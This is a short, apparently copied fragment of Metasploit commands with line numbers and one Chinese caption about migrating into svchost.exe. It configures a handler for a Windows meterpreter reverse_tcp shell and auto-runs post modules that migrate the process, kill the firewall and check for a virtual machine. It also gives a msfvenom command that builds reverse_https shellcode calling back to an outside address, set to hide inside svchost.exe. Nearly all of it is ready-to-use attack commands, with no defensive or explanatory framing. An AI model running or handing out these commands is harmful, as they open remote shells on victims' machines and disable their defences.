set AutoRunScript multi_console_command -rc /home/kali/Desktop/automsf.rc
1 2 3
run post/windows/manage/migrate run post/windows/manage/killfw run post/windows/gather/checkvm
1 2 3 4 5 6 7 8
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.4 set LPORT 8080 set ExitOnSession false run post/windows/manage/migrate run post/windows/manage/killfw run post/windows/gather/checkvm
自动迁移到svchost.exe
1
msfvenom -p windows/meterpreter/reverse_https -a x86 -f csharp --platform windows -o out.txt -b "\x00\xff"LHOST=175.12.80.10 LPORT=4433 PrependMigrate=truePrependMigrateProc=svchost.exe